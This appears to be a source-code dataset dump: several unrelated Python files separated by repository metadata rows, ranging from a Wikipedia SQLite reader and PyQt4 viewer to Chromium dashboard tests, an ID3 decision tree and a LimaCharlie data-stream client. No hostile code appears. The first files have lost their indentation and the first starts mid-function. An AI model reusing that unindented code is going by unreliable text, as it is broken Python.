row = c.execute("SELECT title, text, opening_text, auxiliary_text, categories, headings, wiki_text, popularity_score, num_incoming_links FROM articles WHERE title=?", (query,)).fetchone()
if row is None:
return None
return WikipediaArticle(self,
row[0], # title
row[1], # text
row[2], # opening_text
json.loads(row[3]), # auxiliary_text
json.loads(row[4]), # categories
json.loads(row[5]), # headings
row[6], # wiki_text
row[7], # popularity_score
row[8], # num_incoming_links
)
def get_document_by_id(self, doc_id):
"""Gets the document (i.e. WikipediaArticle) for the given id (i.e. title).
Override for Collection.
Returns:
WikipediaArticle: The WikipediaArticle for the given id.
"""
c = self.db.cursor()
row = c.execute("SELECT text, opening_text, auxiliary_text, categories, headings, wiki_text, popularity_score, num_incoming_links FROM articles WHERE title=?", (doc_id,)).fetchone()
if row is None:
return None
return WikipediaArticle(self, doc_id,
row[0], # text
row[1], # opening_text
json.loads(row[2]), # auxiliary_text
json.loads(row[3]), # categories
json.loads(row[4]), # headings
row[5], # wiki_text
row[6], # popularity_score
row[7], # num_incoming_links
)
def num_documents(self):
"""Returns the number of documents (i.e. WikipediaArticle).
Override for Collection.
Returns:
int: The number of documents in the collection.
"""
if self._cached_num_documents is None:
c = self.db.cursor()
num_documents = c.execute("SELECT COUNT(*) FROM articles").fetchone()[0]
self._cached_num_documents = num_documents
return self._cached_num_documents
def get_all_documents(self):
"""Creates an iterator that iterates through all documents (i.e. WikipediaArticles) in the collection.
Returns:
Iterable[WikipediaArticle]: All the documents in the collection.
"""
c = self.db.cursor()
c.execute("SELECT title, text, opening_text, auxiliary_text, categories, headings, wiki_text, popularity_score, num_incoming_links FROM articles")
BLOCK_SIZE = 1000
while True:
block = c.fetchmany(BLOCK_SIZE)
if len(block) == 0:
break
for row in block:
yield WikipediaArticle(self,
row[0], # title
row[1], # text
row[2], # opening_text
json.loads(row[3]), # auxiliary_text
json.loads(row[4]), # categories
json.loads(row[5]), # headings
row[6], # wiki_text
row[7], # popularity_score
row[8], # num_incoming_links
)
| [
"keishi.hattori@gmail.com"
] | keishi.hattori@gmail.com |
011d3b37d7cb2a349a9f335003c370504e1fc868 | 26fb93b2df4b6226e708027beccb2f0d442a4522 | /MWTracker/GUI_Qt4/SWTrackerViewer/SWTrackerViewer_GUI.py | fbf28e5f0a9297acd767443f273c16285271614c | [] | no_license | KezhiLi/Multiworm_Tracking | bb4fd1d1beeab26f4402f5aa5a3f159700fa0009 | cd91e968a557957e920d61db8bc10957666b6bc2 | refs/heads/master | 2021-01-22T16:10:23.591064 | 2016-04-13T15:51:18 | 2016-04-13T15:51:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,201 | py | import sys
from PyQt4.QtGui import QApplication, QMainWindow, QFileDialog, QMessageBox, QFrame
from PyQt4.QtCore import QDir, QTimer, Qt, QPointF
from PyQt4.QtGui import QPixmap, QImage, QPainter, QColor, QFont, QPolygonF, QPen
from MWTracker.GUI_Qt4.SWTrackerViewer.SWTrackerViewer_ui import Ui_ImageViewer
from MWTracker.GUI_Qt4.MWTrackerViewerSingle.MWTrackerViewerSingle_GUI import MWTrackerViewerSingle_GUI
from MWTracker.trackWorms.getSkeletonsTables import getWormMask, binaryMask2Contour
from MWTracker.intensityAnalysis.correctHeadTailIntensity import createBlocks, _fuseOverlapingGroups
import tables, os
import numpy as np
import pandas as pd
import cv2
import json
class SWTrackerViewer_GUI(MWTrackerViewerSingle_GUI):
def __init__(self, ui = ''):
if not ui:
super().__init__(Ui_ImageViewer())
else:
super().__init__(ui)
self.skel_block = []
self.skel_block_n = 0
self.is_stage_move = []
self.ui.spinBox_skelBlock.valueChanged.connect(self.changeSkelBlock)
def updateSkelFile(self):
super().updateSkelFile()
with tables.File(self.skel_file, 'r') as fid:
if '/provenance_tracking/INT_SKE_ORIENT' in fid:
prov_str = fid.get_node('/provenance_tracking/INT_SKE_ORIENT').read()
func_arg_str = json.loads(prov_str.decode("utf-8"))['func_arguments']
gap_size = json.loads(func_arg_str)['gap_size']
good = (self.trajectories_data['int_map_id']>0).values
has_skel_group = createBlocks(good, min_block_size = 0)
self.skel_block = _fuseOverlapingGroups(has_skel_group, gap_size = gap_size)
else:
self.skel_block = []
self.ui.spinBox_skelBlock.setMaximum(max(len(self.skel_block)-1,0))
self.ui.spinBox_skelBlock.setMinimum(0)
if self.skel_block_n != 0:
self.skel_block_n = 0
self.ui.spinBox_skelBlock.setValue(0)
else:
self.changeSkelBlock(0)
with tables.File(self.skel_file, 'r') as fid:
if '/stage_movement/stage_vec' in fid:
self.is_stage_move = np.isnan(fid.get_node('/stage_movement/stage_vec')[:,0])
else:
self.is_stage_move = []
def updateImage(self):
self.readImage()
self.drawSkelResult()
if len(self.is_stage_move) > 0 and self.is_stage_move[self.frame_number]:
painter = QPainter()
painter.begin(self.frame_qimg)
pen = QPen()
pen_width = 3
pen.setWidth(pen_width)
pen.setColor(Qt.red)
painter.setPen(pen)
painter.drawRect(1, 1, self.frame_qimg.width()-pen_width, self.frame_qimg.height()-pen_width);
painter.end()
print(1)
self.pixmap = QPixmap.fromImage(self.frame_qimg)
self.ui.imageCanvas.setPixmap(self.pixmap);
def changeSkelBlock(self, val):
self.skel_block_n = val
if len(self.skel_block) > 0:
self.ui.label_skelBlock.setText('Block limits: %i-%i' % (self.skel_block[self.skel_block_n]))
#move to the frame where the block starts
self.ui.spinBox_frame.setValue(self.skel_block[self.skel_block_n][0])
else:
self.ui.label_skelBlock.setText('')
#change frame number using the keys
def keyPressEvent(self, event):
#go the previous block
if event.key() == 91:
self.ui.spinBox_skelBlock.setValue(self.skel_block_n-1)
#go to the next block
elif event.key() == 93:
self.ui.spinBox_skelBlock.setValue(self.skel_block_n+1)
elif event.key() == 59:
if self.ui.checkBox_showLabel.isChecked():
self.ui.checkBox_showLabel.setChecked(0)
else:
self.ui.checkBox_showLabel.setChecked(1)
super().keyPressEvent(event)
if __name__ == '__main__':
app = QApplication(sys.argv)
ui = SWTrackerViewer_GUI()
ui.show()
sys.exit(app.exec_())
| [
"ver228@gmail.com"
] | ver228@gmail.com |
bf068617a07cc247a0e776ea487f6d60f4cbd555 | c36f43dc25cd7f2b52aa606f57bc9d690c248242 | /Python Data Visualisation/solutions/case_studies/case_study_d_flytipping.py | 84018bb1f60c90f74485d7dca81fab9fdfa71250 | [] | no_license | rachelchalmersCDDO/hello-git | 53a400f64ba49c84aca7afe0f4af9901effd753a | 0f72eceed31f503cea526785e8716321a7f31e78 | refs/heads/main | 2023-04-27T04:37:45.071999 | 2021-05-11T11:48:59 | 2021-05-11T11:48:59 | 366,358,490 | 0 | 0 | null | 2021-05-11T11:48:59 | 2021-05-11T11:31:10 | Jupyter Notebook | UTF-8 | Python | false | false | 2,630 | py | figure, axes = plt.subplots(figsize = (8,4)) # Set up our figure and axis
axes.axis("off") # Removes the axis from the figure
# Create the header - This is easiest to create as a new table with 1 row and position above our existing table.
header = plt.table(cellText=[["Number of fly-tipping incidents by waste type"]], cellLoc="left", loc="left",
bbox=[0.111, 0.97, 0.8098, 0.12]) # x, y , length, height
# Set the properties for this text box
for (row, col), cell in header.get_celld().items():
cell.set_text_props(fontproperties=FontProperties(family ="Arial", weight="bold", size = 14), ha = "left")
cell.set_edgecolor("black")
cell.set_linewidth(1)
cell.PAD = 0.01
# Create the Main Table
table = axes.table(cellText=flytipping.values, # Values we want in the cells
colLabels=flytipping.columns.str.replace(" ", "\n") , # Our column headers
loc="upper left", # Where we want our table located
edges="closed") # Draws a grid around the cells
# Set top row to Bold and make taller
for (row, col), cell in table.get_celld().items():
if (row == 0) or (col == -1):
cell.set_height(0.22)
cell.set_text_props(fontproperties=FontProperties(family="Arial", weight="bold", size=14),
ma="right", va="bottom")
cell.set_edgecolor("black")
cell.set_linewidth(1)
cell.PAD = 0.04
else:
cell.set_text_props(fontproperties=FontProperties(family="Arial", size=12), ma="right")
cell.set_edgecolor("black")
cell.set_linewidth(1)
cell.PAD=0.04
# Loop over column 1 and make bold
for (row, col), cell in table.get_celld().items():
if (col == 0):
cell.set_text_props(weight="bold")
# Loop over each column and auto set the width
for each_column in range(len(flytipping.columns)):
table.auto_set_column_width(each_column)
# Set Title and Captions
title = "Table 3.1 Types of other fly-tipping in England, 2011/12 to 2018/19 **"
plt.figtext(x=0.04, y=1.1, s=title, ha="left", fontweight="bold", fontsize=16, fontname="sans-serif")
caption = ("""* Other identified includes vehicle parts, animal carcasses, clinical waste, asbestos and ‘chemical drums, oil
and fuel’ \n
** Rounded to the nearest thousand
\n Equivalent figures for 2007/08 to 2010/11 can be seen in the accompanying dataset.""" )
plt.figtext(x=0.08, y=0.12, s=caption, ha="left", fontweight="light", fontsize=10, fontname="sans-serif")
# Set the layout to tight
figure.tight_layout() # Controls the amount of white space around the table | [
"rachel.chalmers@digital.cabinet-office.gov.uk"
] | rachel.chalmers@digital.cabinet-office.gov.uk |
65a76d10ad4faa3451c1076b45faf88e43b89b85 | 9bce32b47bd2f5d676e2c880febc31e0cd2ebada | /core/__init__.py | 0ec37ce465b51e237c214b819e8afab3d0832ce2 | [] | no_license | ranxiao/Predictive-Performance-Eval-Toolbox | fa4a29cac6a5fe870d427c3a137e1eee6ccc6bc7 | e97280c51b13f0d8a2c82ec393a73f64433d1674 | refs/heads/main | 2023-05-30T14:46:51.043669 | 2021-06-24T20:05:41 | 2021-06-24T20:05:41 | 314,012,246 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | from .processors import Process, run | [
"noreply@github.com"
] | noreply@github.com |
4ce90ed6b7934f21c3463432f8284e1baa696b8f | cc1b87f9368e96e9b3ecfd5e0822d0037e60ac69 | /dashboard/dashboard/deprecate_tests_test.py | 63b49de8e073633803e4351d0465573bfede7986 | [
"BSD-3-Clause"
] | permissive | CTJyeh/catapult | bd710fb413b9058a7eae6073fe97a502546bbefe | c98b1ee7e410b2fb2f7dc9e2eb01804cf7c94fcb | refs/heads/master | 2020-08-19T21:57:40.981513 | 2019-10-17T09:51:09 | 2019-10-17T18:30:16 | 215,957,813 | 1 | 0 | BSD-3-Clause | 2019-10-18T06:41:19 | 2019-10-18T06:41:17 | null | UTF-8 | Python | false | false | 9,522 | py | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import datetime
import mock
import unittest
import webapp2
import webtest
from google.appengine.ext import ndb
from dashboard import deprecate_tests
from dashboard.common import testing_common
from dashboard.common import utils
_DEPRECATE_DAYS = deprecate_tests._DEPRECATION_REVISION_DELTA.days + 1
_REMOVAL_DAYS = deprecate_tests._REMOVAL_REVISON_DELTA.days + 1
_TESTS_SIMPLE = [
['ChromiumPerf'],
['mac'],
{
'SunSpider': {
'Total': {
't': {},
't_ref': {},
},
}
}
]
_TESTS_MULTIPLE = [
['ChromiumPerf'],
['mac'],
{
'SunSpider': {
'Total': {
't': {},
't_ref': {},
},
},
'OtherTest': {
'OtherMetric': {
'foo1': {},
'foo2': {},
},
},
}
]
_TESTS_MULTIPLE_MASTERS_AND_BOTS = [
['ChromiumPerf', 'ChromiumPerfFYI'],
['mac', 'linux'],
{
'SunSpider': {
'Total': {
't': {},
},
}
}
]
class DeprecateTestsTest(testing_common.TestCase):
def setUp(self):
super(DeprecateTestsTest, self).setUp()
app = webapp2.WSGIApplication([(
'/deprecate_tests', deprecate_tests.DeprecateTestsHandler)])
self.testapp = webtest.TestApp(app)
deprecate_tests._DEPRECATE_TESTS_PARALLEL_SHARDS = 2
def _AddMockRows(self, test_path, age):
"""Adds sample TestMetadata and Row entities."""
# Add 50 Row entities to some of the tests.
ts = datetime.datetime.now() - datetime.timedelta(days=age)
data = {}
for i in range(15000, 15100, 2):
data[i] = {'value': 1, 'timestamp': ts}
testing_common.AddRows(test_path, data)
def AssertDeprecated(self, test_path, deprecated):
test_key = utils.TestKey(test_path)
test = test_key.get()
self.assertEqual(test.deprecated, deprecated)
@mock.patch.object(deprecate_tests, '_AddDeleteTestDataTask')
def testPost_DeprecateOldTest(self, mock_delete):
testing_common.AddTests(*_TESTS_MULTIPLE)
self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t', _DEPRECATE_DAYS)
self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t_ref', 0)
self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo1', 0)
self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo2', 0)
self.testapp.post('/deprecate_tests')
self.ExecuteTaskQueueTasks(
'/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
self.AssertDeprecated('ChromiumPerf/mac/SunSpider', False)
self.AssertDeprecated('ChromiumPerf/mac/SunSpider/Total/t', True)
self.AssertDeprecated('ChromiumPerf/mac/SunSpider/Total/t_ref', False)
self.assertFalse(mock_delete.called)
@mock.patch.object(deprecate_tests, '_AddDeleteTestDataTask')
def testPost_DeprecateOldTestDeprecatesSuite(self, mock_delete):
testing_common.AddTests(*_TESTS_MULTIPLE)
self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t', _DEPRECATE_DAYS)
self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t_ref', _DEPRECATE_DAYS)
self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo1', 0)
self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo2', 0)
self.testapp.post('/deprecate_tests')
self.ExecuteTaskQueueTasks(
'/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
# Do a second pass to catch the suite
self.testapp.post('/deprecate_tests')
self.ExecuteTaskQueueTasks(
'/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
self.AssertDeprecated('ChromiumPerf/mac/SunSpider', True)
self.AssertDeprecated('ChromiumPerf/mac/SunSpider/Total/t', True)
self.AssertDeprecated('ChromiumPerf/mac/SunSpider/Total/t_ref', True)
self.assertFalse(mock_delete.called)
@mock.patch.object(deprecate_tests, '_AddDeleteTestDataTask')
def testPost_DoesNotDeleteRowsWithChildren(self, mock_delete):
testing_common.AddTests(*_TESTS_SIMPLE)
self._AddMockRows('ChromiumPerf/mac/SunSpider/Total', _REMOVAL_DAYS)
self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t', 0)
self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t_ref', 0)
self.testapp.post('/deprecate_tests')
self.ExecuteTaskQueueTasks(
'/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
# Do a second pass to catch the suite
self.testapp.post('/deprecate_tests')
self.ExecuteTaskQueueTasks(
'/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
self.AssertDeprecated('ChromiumPerf/mac/SunSpider', False)
self.AssertDeprecated('ChromiumPerf/mac/SunSpider/Total', True)
self.AssertDeprecated('ChromiumPerf/mac/SunSpider/Total/t', False)
self.assertFalse(mock_delete.called)
@mock.patch.object(deprecate_tests, '_AddDeleteTestDataTask')
def testPost_DeprecateOldTestDeletesData(self, mock_delete):
testing_common.AddTests(*_TESTS_MULTIPLE)
self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t', _REMOVAL_DAYS)
self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t_ref', 0)
self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo1', 0)
self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo2', 0)
self.testapp.post('/deprecate_tests')
self.ExecuteTaskQueueTasks(
'/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
test = utils.TestKey('ChromiumPerf/mac/SunSpider/Total/t').get()
mock_delete.assert_called_once_with(test)
@mock.patch.object(deprecate_tests, '_AddDeleteTestDataTask')
def testPost_DeletesTestsWithNoRowsOrChildren(self, mock_delete):
testing_common.AddTests(*_TESTS_MULTIPLE)
self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t', 0)
self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo1', 0)
self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo2', 0)
self.testapp.post('/deprecate_tests')
self.ExecuteTaskQueueTasks(
'/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
test = utils.TestKey('ChromiumPerf/mac/SunSpider/Total/t_ref').get()
mock_delete.assert_called_once_with(test)
@mock.patch.object(
deprecate_tests, '_AddDeprecateTestDataTask', mock.MagicMock())
def testPost_DeletesBot_NotMaster(self):
testing_common.AddTests(*_TESTS_MULTIPLE_MASTERS_AND_BOTS)
utils.TestKey('ChromiumPerf/mac/SunSpider/Total/t').delete()
utils.TestKey('ChromiumPerf/mac/SunSpider/Total').delete()
utils.TestKey('ChromiumPerf/mac/SunSpider').delete()
for m in _TESTS_MULTIPLE_MASTERS_AND_BOTS[0]:
for b in _TESTS_MULTIPLE_MASTERS_AND_BOTS[1]:
master_key = ndb.Key('Master', m)
bot_key = ndb.Key('Bot', b, parent=master_key)
self.assertIsNotNone(bot_key.get())
self.assertIsNotNone(master_key.get())
self.testapp.get('/deprecate_tests')
self.ExecuteDeferredTasks(deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
expected_deleted_bots = [ndb.Key('Master', 'ChromiumPerf', 'Bot', 'mac')]
for m in _TESTS_MULTIPLE_MASTERS_AND_BOTS[0]:
for b in _TESTS_MULTIPLE_MASTERS_AND_BOTS[1]:
master_key = ndb.Key('Master', m)
bot_key = ndb.Key('Bot', b, parent=master_key)
if bot_key in expected_deleted_bots:
self.assertIsNone(bot_key.get())
else:
self.assertIsNotNone(bot_key.get())
self.assertIsNotNone(master_key.get())
@mock.patch.object(
deprecate_tests, '_AddDeprecateTestDataTask', mock.MagicMock())
def testPost_DeletesMasterAndBot(self):
testing_common.AddTests(*_TESTS_MULTIPLE_MASTERS_AND_BOTS)
utils.TestKey('ChromiumPerf/mac/SunSpider/Total/t').delete()
utils.TestKey('ChromiumPerf/mac/SunSpider/Total').delete()
utils.TestKey('ChromiumPerf/mac/SunSpider').delete()
utils.TestKey('ChromiumPerf/linux/SunSpider/Total/t').delete()
utils.TestKey('ChromiumPerf/linux/SunSpider/Total').delete()
utils.TestKey('ChromiumPerf/linux/SunSpider').delete()
for m in _TESTS_MULTIPLE_MASTERS_AND_BOTS[0]:
for b in _TESTS_MULTIPLE_MASTERS_AND_BOTS[1]:
master_key = ndb.Key('Master', m)
bot_key = ndb.Key('Bot', b, parent=master_key)
self.assertIsNotNone(bot_key.get())
self.assertIsNotNone(master_key.get())
self.testapp.get('/deprecate_tests')
self.ExecuteDeferredTasks(deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
expected_deleted_bots = [
ndb.Key('Master', 'ChromiumPerf', 'Bot', 'mac'),
ndb.Key('Master', 'ChromiumPerf', 'Bot', 'linux')]
expected_deleted_masters = [ndb.Key('Master', 'ChromiumPerf')]
for m in _TESTS_MULTIPLE_MASTERS_AND_BOTS[0]:
master_key = ndb.Key('Master', m)
if master_key in expected_deleted_masters:
self.assertIsNone(master_key.get())
else:
self.assertIsNotNone(master_key.get())
for b in _TESTS_MULTIPLE_MASTERS_AND_BOTS[1]:
bot_key = ndb.Key('Bot', b, parent=master_key)
if bot_key in expected_deleted_bots:
self.assertIsNone(bot_key.get())
else:
self.assertIsNotNone(bot_key.get())
if __name__ == '__main__':
unittest.main()
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
25e72161c8d4276d21d755c960750c74d408ce34 | 8f75dae40363144b7ea0eccb1b2fab804ee60711 | /tests/integration/goldens/credentials/samples/generated_samples/iamcredentials_v1_generated_iam_credentials_sign_blob_async.py | fffa6de4bc73a43e8c4de2347fdbc936e2ed972e | [
"Apache-2.0"
] | permissive | software-dov/gapic-generator-python | a2298c13b02bff87888c2949f4909880c3fa2408 | 304b30d3b4ec9ccb730251154b10896146a52900 | refs/heads/master | 2022-06-04T00:14:28.559534 | 2022-02-28T18:13:26 | 2022-02-28T18:13:26 | 191,990,527 | 0 | 1 | Apache-2.0 | 2022-01-27T19:35:04 | 2019-06-14T18:41:06 | Python | UTF-8 | Python | false | false | 1,491 | py | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for SignBlob
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-iam-credentials
# [START iamcredentials_v1_generated_IAMCredentials_SignBlob_async]
from google.iam import credentials_v1
async def sample_sign_blob():
# Create a client
client = credentials_v1.IAMCredentialsAsyncClient()
# Initialize request argument(s)
request = credentials_v1.SignBlobRequest(
name="name_value",
payload=b'payload_blob',
)
# Make the request
response = await client.sign_blob(request=request)
# Handle the response
print(response)
# [END iamcredentials_v1_generated_IAMCredentials_SignBlob_async]
| [
"noreply@github.com"
] | noreply@github.com |
aa2c753332ce7bf08b7e2a7efc44efcee9ed5542 | b10917820bac7e879c6e4b4a480d42e816675542 | /ID3_Decision Tree Algorithm.py | 564ee6850ac92bad323dd5f4c5c650e854cb00ab | [] | no_license | ronypy/ID3-Decision-Tree-algorithm | 8c753a3a6028dc7e29c70f77de7beae780b6a696 | f3ec2d34901297333125b0a15ce00b687e7776d3 | refs/heads/master | 2020-08-22T11:32:16.506272 | 2019-10-20T15:46:30 | 2019-10-20T15:46:30 | 216,385,156 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,450 | py | import csv
import math
# from operator import add
'''
readAllSamples is a user defined function. It is used to read all the sample of CSV file. It takes filename as an argument as well as test row count to make a test set from the file. This function returns a train set and a test set.
'''
def readAllSamples(fileName, test_row_count, Del_colm):
ff1 = csv.reader(fileName)
b = []
a = []
g = []
headers = []
for row in ff1:
b.append(row)
# print(b)
# print(len(b))
for i in range(Del_colm, len(b[0])):
headers.append(b[0][i])
# print(h)
for i in range(1, len(b)):
g.append(b[i])
# print(g)
for i in range(len(g)):
a.append(g[i][Del_colm:(len(g) - 1)])
# print("\n",a)
# print(len(a))
trainSet = []
testSet = []
for i in range(0, (len(a) - test_row_count)):
trainSet.append(a[i])
for i in range((len(a) - test_row_count), len(a)):
testSet.append(a[i])
return trainSet, testSet, headers
f1 = open("Book1.csv", newline='')
test_row = int(input("please provide how many rows you want as test set\n"))
Del_colm = int(input(
"is there any column you want to exclude during gain calculation? if any, please provide column number, otherwise please provide Zero(0) \n"))
train_set, test_set, headers = readAllSamples(f1, test_row, Del_colm)
'''
This is entropy function. It takes table as input and finds out entropy.
'''
def entropy(table):
decision_attribute = []
for i in range(len(table)):
decision_attribute.append(table[i][len(table[0]) - 1])
set_decision_attribute = list(set(decision_attribute))
decision_attribute_count = []
for i in range(len(set_decision_attribute)):
decision_attribute_count.append(decision_attribute.count(set_decision_attribute[i]))
entropy = 0
for i in range(len(set_decision_attribute)):
if (len(set_decision_attribute)) == 1:
entropy = 0
else:
entropy += (-1) * (decision_attribute_count[i] / sum(decision_attribute_count)) * math.log2(
(decision_attribute_count[i] / sum(decision_attribute_count)))
return entropy
'''
informationGain is an user defined function. it takes table, the attribute for which we want to find out entropy and total entropy of the table as input. It returns gain of the attribute.
'''
def informationGain(table, attribute, total_entropy):
table_len = len(table)
att = []
decision_attribute = []
for i in range(len(table)):
decision_attribute.append(table[i][len(table[i]) - 1])
att.append(table[i][attribute])
set_att = list(set(att))
att_count = []
for i in range(0, len(set_att)):
att_count.append(att.count(set_att[i]))
merge_att = []
merge_att_dec = []
header_count = len(set_att) + 1
header = [[] for i in range(1, header_count)]
for j in range(len(set_att)):
for i in range((len(att))):
if att[i] == set_att[j]:
merge_att.append(att[i])
merge_att_dec.append(decision_attribute[i])
new = [[a, merge_att_dec[ind]] for ind, a in enumerate(merge_att)]
entropy_list_attr = []
for j in range(len(set_att)):
for i in range((len(new))):
if new[i][0] == set_att[j]:
header[j].append(new[i])
entropy_list_attr.append(entropy(header[j]))
entropy_att = 0
for i in range(len(set_att)):
entropy_att += ((att_count[i] * entropy_list_attr[i]) / sum(att_count))
gain = total_entropy - entropy_att
return gain
# Finding out column of maximum gain
def gainMatrix(train_set, total_entropy):
gain = []
for i in range(len(train_set[0]) - 1):
gain.append(informationGain(train_set, i, total_entropy))
max_gain_column = gain.index(max(gain))
# print(gain)
# print(train_set)
return max_gain_column
# This function split data and create tree.
def splitData(train_set, max_gain_column, headers, counter):
set_max_gain_column = []
for i in range(len(train_set)):
set_max_gain_column.append(train_set[i][max_gain_column])
set_max_gain_column = list(set(set_max_gain_column))
# print(set_max_gain_column)
new_train_set = []
child_root_gain = []
child = [[] for i in range(len(set_max_gain_column))]
for j in range(len(set_max_gain_column)):
for i in range(len(train_set)):
if (train_set[i][max_gain_column] == set_max_gain_column[j]):
child[j].append(train_set[i])
# print(child)
# print(child)
k = counter
ent = []
for i in range(len(child)):
ent.append(entropy(child[i]))
# print(ent)
child, ent = zip(*sorted(zip(child, ent)))
# print(child)
# print(ent)
# qq=sorted(set(child), key=child.index)
# print(qq)
# k=k+1
for i in range(len(child)):
root_child_entropy = entropy(child[i])
max_gain_column = gainMatrix(child[i], root_child_entropy)
if root_child_entropy == 0:
# print("root _child node will be col", set_max_gain_column, "& element count will be", len(child[i]) )
# max_gain_column=gainMatrix(child[i], root_child_entropy)
# print(child[i])
# print(max_gain_column)
print(
"For {} {}, decision will be {}".format(headers[k], child[i][0][k], child[i][0][len(child[i][0]) - 1]))
else:
k = gainMatrix(child[i], root_child_entropy)
# print("k",k)
print("child_root will be {} ".format(headers[max_gain_column]))
# print(child[i])
splitData(child[i], max_gain_column, headers, k)
# pass
# print(child[i])
# for i in range(len(child[i][0][max_gain_column])):
# splitData(child[i], max_gain_column,headers,k)
# splitData.counter+=1
# print(splitData.counter)
# print(k)
return child
total_entropy = entropy(train_set)
# print('Total entropy\n',total_entropy)
xx = gainMatrix(train_set, total_entropy)
print("root will be {}".format(headers[xx]))
counter = 0
pp = splitData(train_set, xx, headers, counter)
# the end
| [
"noreply@github.com"
] | noreply@github.com |
14759c80b4c7aa5733b45151693919130262ebcd | 25ba2f7256c15ed23c129837380f340ad56a932e | /limacharlie/Spout.py | 75852122d299f39e84f6d61556da862e9d22b141 | [
"Apache-2.0"
] | permissive | macdaliot/python-limacharlie | c60d4b5d7a7a8985bc67208b88b5fa0748866fd3 | dc8011418f09d3acc0ebce5ea3afb98e4b7f600f | refs/heads/master | 2021-06-17T08:27:28.358390 | 2018-11-25T15:09:33 | 2018-11-25T15:09:33 | 161,183,497 | 0 | 0 | Apache-2.0 | 2021-02-09T18:28:39 | 2018-12-10T14:00:08 | Python | UTF-8 | Python | false | false | 10,197 | py | from gevent import monkey; monkey.patch_all()
from gevent.queue import Queue
import gevent.pool
import sys
import json
import requests
import os
import traceback
import uuid
import time
from .utils import *
_CLOUD_KEEP_ALIVES = 60
_TIMEOUT_SEC = ( _CLOUD_KEEP_ALIVES * 2 ) + 1
class Spout( object ):
'''Listener object to receive data (Events, Detects or Audit) from a limacharlie.io Organization in pull mode.'''
def __init__( self, man, data_type, is_parse = True, max_buffer = 1024, inv_id = None, tag = None, cat = None, sid = None, extra_params = {} ):
'''Connect to limacharlie.io to start receiving data.
Args:
manager (limacharlie.Manager obj): a Manager to use for interaction with limacharlie.io.
data_typer (str): the type of data received from the cloud as specified in Outputs (event, detect, audit).
is_parse (bool): if set to True (default) the data will be parsed as JSON to native Python.
max_buffer (int): the maximum number of messages to buffer in the queue.
inv_id (str): only receive events marked with this investigation ID.
tag (str): only receive Events from Sensors with this Tag.
cat (str): only receive Detections of this Category.
sid (str): only receive Events or Detections from this Sensor.
'''
self._man = man
self._oid = man._oid
self._data_type = data_type
self._cat = cat
self._tag = tag
self._invId = inv_id
self._sid = sid
self._is_parse = is_parse
self._max_buffer = max_buffer
self._dropped = 0
self._isStop = False
# This is used to register FutureResults objects where data should go
# based on the full value of an investigation ID (including the custom tracking after "/").
self._futures = {}
if self._data_type not in ( 'event', 'detect', 'audit' ):
raise LcApiException( 'Invalid data type: %s' % self._data_type )
# Setup internal structures.
self.queue = Queue( maxsize = self._max_buffer )
self._threads = gevent.pool.Group()
# Connect to limacharlie.io.
spoutParams = { 'type' : self._data_type }
if man._secret_api_key:
spoutParams[ 'api_key' ] = man._secret_api_key
else:
spoutParams[ 'jwt' ] = man._jwt
if inv_id is not None:
spoutParams[ 'inv_id' ] = self._invId
if tag is not None:
spoutParams[ 'tag' ] = self._tag
if cat is not None:
spoutParams[ 'cat' ] = self._cat
if sid is not None:
spoutParams[ 'sid' ] = self._sid
for k, v in extra_params.iteritems():
spoutParams[ k ] = v
# Spouts work by doing a POST to the output.limacharlie.io service with the
# OID, Secret Key and any Output parameters we want. This POST will return
# us an HTTP 303 See Other with the actual URL where the output will be
# created for us. We take note of this redirect URL so that if need to
# reconnect later we don't need to re-do the POST again. The redirected URL
# contains a path with a randomized value which is what we use a short term
# shared secret to get the data stream since we are not limiting connections
# by IP.
self._hConn = requests.post( 'https://output.limacharlie.io/output/%s' % ( self._oid, ),
data = spoutParams,
stream = True,
allow_redirects = True,
timeout = _TIMEOUT_SEC )
if self._hConn.status_code != 200:
raise LcApiException( 'failed to open Spout: %s' % self._hConn.text )
